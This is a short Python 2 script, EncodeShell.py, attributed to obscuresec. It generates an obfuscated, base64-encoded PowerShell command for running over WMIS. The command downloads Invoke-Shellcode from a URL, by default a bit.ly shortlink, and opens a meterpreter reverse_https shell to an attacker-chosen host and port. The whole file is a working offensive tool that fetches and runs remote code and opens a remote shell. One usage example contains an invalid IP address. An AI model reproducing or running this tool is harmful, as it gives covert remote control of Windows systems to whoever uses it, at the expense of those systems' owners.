EncodeShell.py

1. #!/usr/bin/env python
2. #
3. # EncodeShell.py
4. # Simple python script to output meterpreter commands for WMIS
5. # by Chris Campbell (obscuresec)
6. #
7. import base64
8. import sys
9.  
10. def build(url,lhost,lport):
11.     #build script syntax
12.     script = "IEX (New-Object Net.WebClient).DownloadString('{0}'); Invoke-Shellcode ".format(url)
13.     script += "-Payload windows/meterpreter/reverse_https -Lhost {0} -Lport {1} -Force".format(lhost,lport)
14.  
15.     print "The powershell syntax to be run:"
16.     print ""
17.     print script
18.     print ""
19.  
20.     #convert string to LE Unicode
21.     unicode = script.encode('utf_16_le')
22.    
23.     #base64 encode the script portion
24.     encoded = base64.b64encode(unicode)
25.  
26.     #build the final command
27.     cmd = "cmd.exe /c powershell.exe -nop -nol -enc {0}".format(encoded)
28.  
29.     #check length in case long url is provided
30.     #http://support.microsoft.com/kb/830473
31.     cmdlen = len(cmd)
32.     if cmdlen > 8191:
33.         print "The length of the command is to long to use! Limit is 8191"
34.         print "Try using a URL shortener."
35.     return cmd
36.  
37. #grab args
38. try:
39.     lhost = sys.argv[1]
40.     lport = sys.argv[2]
41.     url = sys.argv[3]
42.    
43.     if url == 'default':
44.         url = 'http://bit.ly/14bZZ0c'
45.  
46.     ps = build(url,lhost,lport)
47.    
48.     print "The command is:"
49.     print ""
50.     print ps   
51.  
52. #index error
53. except IndexError:
54.     print "python EncodeShell.py lhost lport url"
55.     print "ex: python EncodeShell.py '192.268.4.5' '443' 'default'"
56.     print "ex: python EncodeShell.py '192.268.4.5' '443' 'http://192.168.4.5/powersploit/invoke-shellcode/'"